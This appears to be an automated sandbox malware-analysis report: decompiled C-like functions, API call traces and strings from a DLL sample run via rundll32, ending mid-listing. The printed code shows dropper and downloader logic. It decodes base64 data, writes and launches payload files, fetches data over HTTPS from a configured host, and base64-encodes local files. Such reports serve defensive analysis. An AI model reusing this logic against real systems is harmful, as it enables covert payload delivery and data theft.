Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Non-executed Functions

Function 10002D4B, Relevance: 3.0, APIs: 2, Instructions: 33
encryption

C-Code - Quality: 76%

			E10002D4B(char* _a4, int _a8, DWORD* _a12) {
				DWORD* _t11;
				BYTE* _t12;

				_t11 = _a12;
				_t12 = 0;
				CryptStringToBinaryA(_a4, _a8, 1, 0, _t11, 0, 0);
				if( *_t11 != 0) {
					_push( *_t11);
					_t12 = E10003F01();
					CryptStringToBinaryA(_a4, _a8, 1, _t12, _t11, 0, 0);
				}
				return _t12;
			}

0x10002d50
0x10002d53
0x10002d61
0x10002d69
0x10002d6b
0x10002d78
0x10002d83
0x10002d83
0x10002d8e

APIs

CryptStringToBinaryA.CRYPT32(0000002C,100073A0,00000001,00000000,?,00000000,00000000), ref: 10002D61
CryptStringToBinaryA.CRYPT32(0000002C,100073A0,00000001,00000000,?,00000000,00000000), ref: 10002D83

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 100022AF, Relevance: .0, Instructions: 40

C-Code - Quality: 100%

			E100022AF(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				intOrPtr* _t14;
				void* _t16;
				intOrPtr _t18;
				void* _t22;
				intOrPtr* _t26;
				void* _t28;

				_t22 = 0;
				if(_a4 != 0) {
					_t18 = _a8;
					if(_t18 != 0) {
						_t14 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
						_v8 = _t14;
						_t26 =  *_t14;
						while(_t26 != _t14) {
							_t16 = E100021DE( *((intOrPtr*)(_t26 + 0x30)),  *(_t26 + 0x2c) & 0x0000ffff, _a12);
							_t28 = _t28 + 0xc;
							if(_t16 == _a4) {
								 *((intOrPtr*)(_t26 + 0x18)) = _t18;
								_t22 = 1;
							} else {
								_t26 =  *_t26;
								_t14 = _v8;
								continue;
							}
							break;
						}
					}
				}
				return _t22;
			}

0x100022b4
0x100022b9
0x100022bc
0x100022c1
0x100022cd
0x100022d0
0x100022d3
0x100022d5
0x100022e4
0x100022e9
0x100022ef
0x100022fa
0x100022fd
0x100022f1
0x100022f1
0x100022f3
0x00000000
0x100022f3
0x00000000
0x100022ef
0x100022fe
0x100022ff
0x10002306

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10002476, Relevance: .0, Instructions: 39

C-Code - Quality: 100%

			E10002476(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t11;
				void* _t13;
				intOrPtr* _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr* _t21;
				void* _t23;

				_t19 = 0;
				if(_a4 != 0) {
					_t11 =  *[fs:0x30];
					if(_t11 != 0) {
						_t16 =  *((intOrPtr*)(_t11 + 0xc)) + 0xc;
						_t21 =  *_t16;
						while(_t21 != _t16) {
							_t18 = 0;
							if(_a12 <= ( *(_t21 + 0x2c) & 0x0000ffff)) {
								_t13 = E100021DE( *((intOrPtr*)(_t21 + 0x30)), _a12, _a8);
								_t23 = _t23 + 0xc;
								_t18 = _t13;
							}
							if(_t18 != _a4) {
								_t21 =  *_t21;
							} else {
								_t19 =  *((intOrPtr*)(_t21 + 0x18));
							}
							if(_t19 == 0) {
								continue;
							}
							break;
						}
					}
				}
				return _t19;
			}

0x1000247a
0x1000247f
0x10002481
0x10002489
0x1000248f
0x10002493
0x10002495
0x1000249d
0x100024a2
0x100024ad
0x100024b2
0x100024b5
0x100024b5
0x100024ba
0x100024c1
0x100024bc
0x100024bc
0x100024bc
0x100024c5
0x00000000
0x00000000
0x00000000
0x100024c5
0x100024c8
0x10002489
0x100024cd

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 100038DB, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 217
filethreadlibrary

C-Code - Quality: 89%

			E100038DB(void* __ecx, void* _a4, long _a8) {
				WCHAR* _v8;
				void* _v12;
				long _v16;
				int _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v48;
				intOrPtr _v72;
				char _v112;
				char _v116;
				void* __ebx;
				void* _t48;
				int _t49;
				WCHAR* _t51;
				short _t52;
				int _t55;
				int _t62;
				struct HINSTANCE__* _t74;
				WCHAR* _t77;
				long _t79;
				struct HINSTANCE__* _t84;
				void* _t91;
				long _t93;
				WCHAR* _t94;
				short _t98;
				short _t101;
				void* _t102;
				void* _t103;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;

				_t102 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					_t48 = 0x12;
					return _t48;
				} else {
					SetLastError(0);
					_t49 = CreateDirectoryW( *(_t102 + 0xc), 0);
					_t93 = GetLastError();
					if(_t49 != 0 || _t93 == 0xb7) {
						_push(0x802);
						_t51 = E10003F01();
						_t101 = 0x25;
						_t98 = 0x73;
						_t94 = _t51;
						_v32 = _t101;
						_t52 = 0x5c;
						_v28 = _t52;
						_v22 = 0;
						_v8 = _t94;
						_v30 = _t98;
						_v26 = _t101;
						_v24 = _t98;
						_t55 = wsprintfW(_t94,  &_v32,  *(_t102 + 0xc),  *((intOrPtr*)(_t102 + 4)));
						_t114 = _t113 + 0x14;
						_v20 = _t55;
						SetLastError(0);
						_v12 = CreateFileW(_t94, 0x40000000, 0, 0, 2, 2, 0);
						_t93 = GetLastError();
						if(_v12 == 0xffffffff) {
							L19:
							E10003F0A(_v8);
							goto L20;
						}
						SetLastError(0);
						_v16 = 0;
						_t62 = WriteFile(_v12, _a4, _a8,  &_v16, 0);
						_t93 = GetLastError();
						CloseHandle(_v12);
						if(_t62 == 0) {
							goto L19;
						}
						E10003104( &_v112, 0, 0x40);
						_t115 = _t114 + 0xc;
						_v116 = 0x44;
						asm("xorps xmm0, xmm0");
						_v72 = 1;
						asm("movups [ebp-0x2c], xmm0");
						if( *((char*)(_t102 + 0x10)) == 0) {
							__eflags =  *(_t102 + 8);
							if( *(_t102 + 8) == 0) {
								__eflags =  *((char*)(_t102 + 0x12));
								if( *((char*)(_t102 + 0x12)) == 0) {
									L17:
									if( *((char*)(_t102 + 0x11)) != 0) {
										_t43 = _v20 + _v20 + 0x12; // 0x12
										_t103 = E10003F01();
										E100030DF(_t103,  &_v48, 0x10);
										_t46 = _t103 + 0x10; // 0x10
										E100030DF(_t46, _v8, _v20 + _v20);
										CreateThread(0, 0, E1000389C, _t103, 0, 0);
									}
									goto L19;
								}
								SetLastError(0);
								_t74 = LoadLibraryW(_v8);
								__eflags = _t74;
								if(_t74 == 0) {
									L16:
									_t93 = GetLastError();
									goto L17;
								}
								_t93 = 0;
								FreeLibrary(_t74);
								goto L17;
							}
							_push(0x802);
							_t77 = E10003F01();
							_t112 = _t77;
							_a4 = E10002F3F(_t98, 0x100072fc, 0xc);
							_t79 = E10002DD6(__eflags, _t78);
							_a8 = _t79;
							wsprintfW(_t77, L"%s \"%s\", %s", _t79, _v8,  *(_t102 + 8));
							_t93 = 0;
							E10003786(0, _t98, 0);
							_t84 = E10003274(0, _t77, 0, 0, 0, 0, 0, 0,  &_v116,  &_v48);
							_t117 = _t115 + 0x50;
							__eflags = _t84;
							if(_t84 == 0) {
								_t93 = GetLastError();
							}
							E10003F0A(_a8);
							E10003F0A(_a4);
							E10003F0A(_t112);
							_t115 = _t117 + 0xc;
							goto L17;
						}
						SetLastError(0);
						_t91 = E10003274(_v8, 0, 0, 0, 0, 0, 0, 0,  &_v116,  &_v48);
						_t115 = _t115 + 0x28;
						if(_t91 == 0) {
							goto L16;
						}
						_t93 = 0;
						goto L17;
					} else {
						L20:
						return _t93;
					}
				}
			}

0x100038e6
0x100038e8
0x10003b3c
0x00000000
0x100038f8
0x100038fc
0x10003907
0x10003915
0x10003919
0x10003927
0x1000392c
0x10003933
0x10003936
0x10003937
0x10003939
0x1000393f
0x10003943
0x1000394c
0x10003955
0x10003958
0x1000395c
0x10003960
0x10003964
0x10003970
0x10003973
0x10003978
0x1000398f
0x1000399c
0x1000399e
0x10003b2b
0x10003b2e
0x00000000
0x10003b33
0x100039a7
0x100039ad
0x100039ba
0x100039cb
0x100039cd
0x100039d5
0x00000000
0x00000000
0x100039e4
0x100039e9
0x100039ec
0x100039f7
0x100039fa
0x10003a01
0x10003a05
0x10003a37
0x10003a3a
0x10003aba
0x10003abe
0x10003ae7
0x10003aeb
0x10003af2
0x10003afb
0x10003b04
0x10003b0d
0x10003b11
0x10003b25
0x10003b25
0x00000000
0x10003aeb
0x10003ac1
0x10003aca
0x10003ad0
0x10003ad2
0x10003adf
0x10003ae5
0x00000000
0x10003ae5
0x10003ad5
0x10003ad7
0x00000000
0x10003ad7
0x10003a3c
0x10003a41
0x10003a4d
0x10003a55
0x10003a58
0x10003a60
0x10003a6d
0x10003a73
0x10003a76
0x10003a8b
0x10003a90
0x10003a93
0x10003a95
0x10003a9d
0x10003a9d
0x10003aa2
0x10003aaa
0x10003ab0
0x10003ab5
0x00000000
0x10003ab5
0x10003a08
0x10003a20
0x10003a25
0x10003a2a
0x00000000
0x00000000
0x10003a30
0x00000000
0x10003b34
0x10003b34
0x00000000
0x10003b37
0x10003919

APIs

SetLastError.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,100062E8,00000000), ref: 100038FC
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,100062E8,00000000,00000000,00000000), ref: 10003907
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,100062E8,00000000,00000000,00000000,00000000,00000000), ref: 1000390F
wsprintfW.USER32 ref: 10003964
SetLastError.KERNEL32(00000000), ref: 10003978
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000002,00000000), ref: 10003989
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,100062E8), ref: 10003992
SetLastError.KERNEL32(00000000), ref: 100039A7
WriteFile.KERNEL32(000000FF,000000FF,00000000,00000000,00000000), ref: 100039BA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,100062E8), ref: 100039C2
CloseHandle.KERNEL32(000000FF), ref: 100039CD
SetLastError.KERNEL32(00000000), ref: 10003A08
CreateThread.KERNEL32(00000000,00000000,1000389C,00000000,00000000,00000000), ref: 10003B25

Part of subcall function 10002DD6: lstrlenA.KERNEL32(100063E9,10006250,?,?,10003CDA,100063E9,00000001,?,100063E9,00000001), ref: 10002DDE

wsprintfW.USER32 ref: 10003A6D

Part of subcall function 10003786: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?,10003A7B,00000000), ref: 1000379C
Part of subcall function 10003786: LoadLibraryA.KERNEL32(00000000), ref: 100037A9
Part of subcall function 10003786: GetProcAddress.KERNEL32(00000000,00000000,00000000,?,10003A7B,00000000), ref: 100037C8

Part of subcall function 10003274: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,10003A90,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044), ref: 1000328E
Part of subcall function 10003274: LoadLibraryA.KERNEL32(00000000), ref: 1000329B
Part of subcall function 10003274: GetProcAddress.KERNEL32(00000000,00000000,?,?,10003A90,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,10005D2A,00000000), ref: 100032BA

GetLastError.KERNEL32 ref: 10003A97
SetLastError.KERNEL32(00000000), ref: 10003AC1
LoadLibraryW.KERNEL32(00000000), ref: 10003ACA
FreeLibrary.KERNEL32(00000000), ref: 10003AD7
GetLastError.KERNEL32 ref: 10003ADF

Strings

D, xrefs: 100039EC
%s "%s", %s, xrefs: 10003A67

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 100019FA, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 153
networkfile

C-Code - Quality: 94%

			E100019FA(void* __edx) {
				char _v8;
				void _v12;
				long _v16;
				long _v20;
				void _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				long _v60;
				void _v64;
				char _v96;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t67;
				DWORD* _t73;
				signed int _t78;
				long _t85;
				void* _t94;
				void* _t97;

				_t73 = 0;
				_v8 = 0;
				if(E1000100E("SNFIRNW",  &_v8) != 0 && _v8 != 0) {
					_t46 = E10001B87(__edx,  &_v96, _v8);
					_t78 = 8;
					memcpy( &_v64, _t46, _t78 << 2);
					_t48 = InternetOpenA(_v64, _v60, _v56, 0, 0);
					_v32 = _t48;
					_t49 = InternetConnectA(_t48, _v52, 0x1bb, 0, 0, 3, 0, 0);
					_v28 = _t49;
					_t97 = HttpOpenRequestA(_t49, _v48, _v44, 0, 0, 0, 0x800000, 0);
					E10001C7D(0, _t97);
					_push(_v36);
					if(HttpSendRequestA(_t97, 0, 0, _v36, E10002B95()) != 0) {
						_v24 = 0;
						_v16 = 4;
						HttpQueryInfoA(_t97, 0x20000013,  &_v24,  &_v16, 0);
						if(_v24 != 0xc8) {
							E10001DD8(_v8, "2", 1);
						} else {
							_v16 = 4;
							_v12 = 0;
							if(HttpQueryInfoA(_t97, 0x20000005,  &_v12,  &_v16, 0) != 0 && _v12 > 0x24) {
								_t67 = E100027C7(_v12);
								_t85 = _v12;
								_t94 = _t67;
								_v20 = 0;
								do {
									InternetReadFile(_t97, _t73 + _t94, _t85,  &_v20);
									_t73 = _t73 + _v20;
									_t85 = _v12;
								} while (_v20 != 0 && _t73 < _t85);
								if(_t73 == _t85) {
									E10001DD8(_v8, _t94, _t85);
								}
								E100028FC(_t94);
							}
						}
					}
					InternetCloseHandle(_t97);
					InternetCloseHandle(_v28);
					InternetCloseHandle(_v32);
					E100015CD( &_v64);
					E10001000(_v8);
				}
				return 0;
			}

0x10001a04
0x10001a0c
0x10001a18
0x10001a30
0x10001a39
0x10001a41
0x10001a4c
0x10001a60
0x10001a64
0x10001a76
0x10001a83
0x10001a86
0x10001a8b
0x10001aa4
0x10001ab8
0x10001ac2
0x10001ac9
0x10001ad2
0x10001b4e
0x10001ad4
0x10001ad8
0x10001ae3
0x10001af1
0x10001afc
0x10001b02
0x10001b05
0x10001b07
0x10001b0a
0x10001b14
0x10001b1a
0x10001b21
0x10001b21
0x10001b2c
0x10001b33
0x10001b38
0x10001b3c
0x10001b41
0x10001af1
0x10001ad2
0x10001b5d
0x10001b62
0x10001b67
0x10001b6d
0x10001b75
0x10001b7d
0x10001b84

APIs

Part of subcall function 1000100E: OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 10001020
Part of subcall function 1000100E: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,0001000C,?), ref: 1000103D
Part of subcall function 1000100E: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 1000104E
Part of subcall function 1000100E: UnmapViewOfFile.KERNEL32(00000000), ref: 10001065
Part of subcall function 1000100E: CloseHandle.KERNEL32(?), ref: 10001077

InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 10001A4C
InternetConnectA.WININET(00000000,?,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 10001A64
HttpOpenRequestA.WININET(00000000,?,?,00000000,00000000,00000000,00800000,00000000), ref: 10001A7D

Part of subcall function 10001C7D: InternetQueryOptionA.WININET(00000004,0000001F,?,?), ref: 10001C96
Part of subcall function 10001C7D: InternetSetOptionA.WININET(00000004,0000001F,00003180,00000004), ref: 10001CAE

HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 10001A9C
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 10001AC9
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 10001AED

Part of subcall function 100027C7: GetProcessHeap.KERNEL32(00000008,00000000,?,1000546F,00000008,00000010,00000000,00002710,771CC486,00000000,00000000,?,10005B31,?,00000000), ref: 100027CF
Part of subcall function 100027C7: RtlAllocateHeap.NTDLL(00000000,?,1000546F,00000008,00000010,00000000,00002710,771CC486,00000000,00000000,?,10005B31,?,00000000), ref: 100027D6

InternetReadFile.WININET(00000000,?,00000024,?), ref: 10001B14

Part of subcall function 100028FC: GetProcessHeap.KERNEL32(00000008,00008000,?,10002930,00008000,?,1000278D), ref: 1000290B
Part of subcall function 100028FC: HeapFree.KERNEL32(00000000,?,10002930), ref: 10002912

Part of subcall function 10001DD8: Sleep.KERNEL32(000000C8,00000000,?,10002170,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,10001EA5), ref: 10001DE9

InternetCloseHandle.WININET(00000000), ref: 10001B5D
InternetCloseHandle.WININET(?), ref: 10001B62
InternetCloseHandle.WININET(?), ref: 10001B67

Part of subcall function 10001000: CloseHandle.KERNEL32(10001EC9), ref: 10001006

Strings

$, xrefs: 10001AF3
SNFIRNW, xrefs: 10001A07

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10003B47, Relevance: 18.1, APIs: 12, Instructions: 133
file

C-Code - Quality: 86%

			E10003B47(void* __ecx, struct _OVERLAPPED** _a4) {
				void* _v8;
				long _v12;
				short _v14;
				void* _v16;
				short _v18;
				short _v20;
				void* _v22;
				short _v24;
				WCHAR* _v28;
				intOrPtr* _t31;
				short _t32;
				short _t33;
				int _t46;
				long _t47;
				WCHAR* _t54;
				long _t56;
				struct _OVERLAPPED** _t63;
				short _t67;
				short _t68;
				short _t69;
				void* _t71;
				struct _OVERLAPPED* _t72;
				void* _t73;
				void* _t74;

				_t73 = __ecx;
				_t72 = 0;
				if( *((char*)(__ecx + 0x13)) != 0) {
					_push(0x802);
					_t54 = E10003F01();
					_t31 =  *((intOrPtr*)(__ecx + 0xc));
					_v28 = _t54;
					if(_t31 == 0 ||  *_t31 == 0) {
						_t32 = 0x25;
						_v20 = _t32;
						_t33 = 0x73;
						_v18 = _t33;
						_v16 = 0;
						wsprintfW(_t54,  &_v20,  *((intOrPtr*)(_t73 + 4)));
					} else {
						_t67 = 0x25;
						_t71 = 0x73;
						_v24 = _t67;
						_t68 = 0x5c;
						_v20 = _t68;
						_t69 = 0x25;
						_v18 = _t69;
						_v22 = _t71;
						_v16 = _t71;
						_v14 = 0;
						wsprintfW(_t54,  &_v24, _t31,  *((intOrPtr*)(__ecx + 4)));
					}
					SetLastError(_t72);
					_t74 = CreateFileW(_t54, 0x80000000, _t72, _t72, 3, 0x80, _t72);
					_v16 = _t74;
					 *_a4 = GetLastError();
					if(_t74 != 0xffffffff) {
						SetLastError(_t72);
						_t56 = GetFileSize(_t74, _t72);
						 *_a4 = GetLastError();
						if(_t56 != 0xffffffff) {
							_push(_t56);
							_v8 = E10003F01();
							_v12 = _t72;
							SetLastError(_t72);
							_t46 = ReadFile(_t74, _v8, _t56,  &_v12, _t72);
							_t47 = GetLastError();
							_t63 = _a4;
							 *_t63 = _t47;
							if(_t46 != 0 && _v12 == _t56) {
								 *_t63 = _t72;
								_t72 = E10002D8F(_v8, _t56);
							}
							E10003F0A(_v8);
							_t74 = _v16;
						}
						CloseHandle(_t74);
						_t54 = _v28;
					}
					E10003F0A(_t54);
					return _t72;
				}
				return 0;
			}

0x10003b4e
0x10003b51
0x10003b57
0x10003b61
0x10003b6b
0x10003b6d
0x10003b70
0x10003b76
0x10003bb9
0x10003bbc
0x10003bc0
0x10003bc4
0x10003bca
0x10003bd3
0x10003b7d
0x10003b7f
0x10003b82
0x10003b85
0x10003b89
0x10003b8c
0x10003b90
0x10003b94
0x10003b9e
0x10003ba4
0x10003ba8
0x10003bac
0x10003bb2
0x10003bdd
0x10003bf9
0x10003bfb
0x10003c07
0x10003c0c
0x10003c13
0x10003c21
0x10003c2c
0x10003c31
0x10003c33
0x10003c3b
0x10003c3e
0x10003c41
0x10003c51
0x10003c59
0x10003c5f
0x10003c62
0x10003c66
0x10003c71
0x10003c7a
0x10003c7a
0x10003c7f
0x10003c84
0x10003c87
0x10003c89
0x10003c8f
0x10003c8f
0x10003c93
0x00000000
0x10003c9b
0x00000000

APIs

wsprintfW.USER32 ref: 10003BAC
wsprintfW.USER32 ref: 10003BD3
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10003BDD
CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 10003BF3
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10003BFE
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10003C13
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10003C1B
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10003C23
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10003C41
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10003C51
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10003C59

Part of subcall function 10002D8F: CryptBinaryToStringA.CRYPT32(00000000,?,40000001,00000000,00000000), ref: 10002DAB
Part of subcall function 10002D8F: CryptBinaryToStringA.CRYPT32(00000000,?,40000001,00000000,00000000), ref: 10002DC8

CloseHandle.KERNEL32(00000000), ref: 10003C89

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10001F0E, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113
network

C-Code - Quality: 92%

			E10001F0E(void* __edx) {
				char _v5;
				signed int _v12;
				void _v16;
				long _v20;
				void* _v24;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				long _v48;
				void _v52;
				char _v84;
				void* _t34;
				void* _t54;
				signed int _t60;
				void* _t71;
				void* _t76;

				_v12 = _v12 & 0x00000000;
				if(E1000100E("SNFIRNW",  &_v12) != 0 && _v12 != 0) {
					_t34 = E10001B87(__edx,  &_v84, _v12);
					_t60 = 8;
					memcpy( &_v52, _t34, _t60 << 2);
					_t71 = InternetOpenA(_v52, _v48, _v44, 0, 0);
					_t54 = InternetConnectA(_t71, _v40, 0x1bb, 0, 0, 3, 0, 0);
					_t76 = HttpOpenRequestA(_t54, _v36, _v32, 0, 0, 0, 0x800000, 0);
					E10001C7D(0, _t76);
					_push(_v24);
					if(HttpSendRequestA(_t76, 0, 0, _v24, E10002B95()) != 0) {
						_v16 = _v16 & 0x00000000;
						_v20 = 4;
						HttpQueryInfoA(_t76, 0x20000013,  &_v16,  &_v20, 0);
						_v5 = 0x34;
						if(_v16 == 0xc8 || _v16 == 0x194) {
							_v5 = 0x32;
						}
						E10001DD8(_v12,  &_v5, 1);
					}
					InternetCloseHandle(_t76);
					InternetCloseHandle(_t54);
					InternetCloseHandle(_t71);
					E100015CD( &_v52);
					E10001000(_v12);
				}
				return 0;
			}

0x10001f14
0x10001f2a
0x10001f44
0x10001f4d
0x10001f53
0x10001f76
0x10001f8b
0x10001f97
0x10001f9a
0x10001f9f
0x10001fba
0x10001fbc
0x10001fc9
0x10001fd7
0x10001fe4
0x10001fe8
0x10001ff3
0x10001ff3
0x10002000
0x10002005
0x1000200f
0x10002012
0x10002015
0x1000201b
0x10002023
0x1000202c
0x10002032

APIs

Part of subcall function 1000100E: OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 10001020
Part of subcall function 1000100E: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,0001000C,?), ref: 1000103D
Part of subcall function 1000100E: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 1000104E
Part of subcall function 1000100E: UnmapViewOfFile.KERNEL32(00000000), ref: 10001065
Part of subcall function 1000100E: CloseHandle.KERNEL32(?), ref: 10001077

InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 10001F62
InternetConnectA.WININET(00000000,?,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 10001F79
HttpOpenRequestA.WININET(00000000,?,?,00000000,00000000,00000000,00800000,00000000), ref: 10001F91

Part of subcall function 10001C7D: InternetQueryOptionA.WININET(00000004,0000001F,?,?), ref: 10001C96
Part of subcall function 10001C7D: InternetSetOptionA.WININET(00000004,0000001F,00003180,00000004), ref: 10001CAE

HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 10001FB2
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 10001FD7

Part of subcall function 10001DD8: Sleep.KERNEL32(000000C8,00000000,?,10002170,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,10001EA5), ref: 10001DE9

InternetCloseHandle.WININET(00000000), ref: 1000200F
InternetCloseHandle.WININET(00000000), ref: 10002012
InternetCloseHandle.WININET(00000000), ref: 10002015

Part of subcall function 10001000: CloseHandle.KERNEL32(10001EC9), ref: 10001006

Strings

2, xrefs: 10001FF3
SNFIRNW, xrefs: 10001F1C

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 100018AE, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 131
networkfile

C-Code - Quality: 94%

			E100018AE(void* __edx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				long _v52;
				void _v56;
				char _v88;
				void* _t39;
				void* _t41;
				void* _t42;
				char* _t62;
				signed int _t67;
				void* _t84;
				void* _t87;
				void* _t88;
				void* _t89;

				_t62 = 0;
				_v12 = 0;
				if(E1000100E("SNFIRNW",  &_v12) != 0 && _v12 != 0) {
					_t39 = E10001B87(__edx,  &_v88, _v12);
					_t67 = 8;
					memcpy( &_v56, _t39, _t67 << 2);
					_t89 = _t88 + 0xc;
					_t41 = InternetOpenA(_v56, _v52, _v48, 0, 0);
					_v24 = _t41;
					_t42 = InternetConnectA(_t41, _v44, 0x1bb, 0, 0, 3, 0, 0);
					_v20 = _t42;
					_t84 = HttpOpenRequestA(_t42, _v40, _v36, 0, 0, 0, 0x800000, 0);
					_v16 = _t84;
					E10001C7D(0, _t84);
					_push(_v28);
					if(HttpSendRequestA(_t84, 0, 0, _v28, E10002B95()) != 0) {
						_v8 = _v8 | 0xffffffff;
						_t87 = E100027C7(0x10000);
						_t81 = 0;
						if(_v8 != 0) {
							while(1) {
								InternetReadFile(_v16, _t87, 0x10000,  &_v8);
								_t58 = _v8;
								if(_v8 == 0) {
									goto L6;
								}
								_t81 = E1000291A(_t81, _t58 + _t62);
								E100030DF(_t60 + _t62, _t87, _v8);
								_t62 = _t62 + _v8;
								_t89 = _t89 + 0x14;
								if(_v8 != 0) {
									continue;
								}
								goto L6;
							}
						}
						L6:
						E100028FC(_t87);
						E10001DD8(_v12, _t81, _t62);
						_t84 = _v16;
					}
					InternetCloseHandle(_t84);
					InternetCloseHandle(_v20);
					InternetCloseHandle(_v24);
					E100015CD( &_v56);
					E10001000(_v12);
				}
				return 0;
			}

0x100018b8
0x100018c0
0x100018cc
0x100018e4
0x100018ed
0x100018f5
0x100018f5
0x10001900
0x10001914
0x10001918
0x1000192a
0x10001937
0x1000193a
0x1000193d
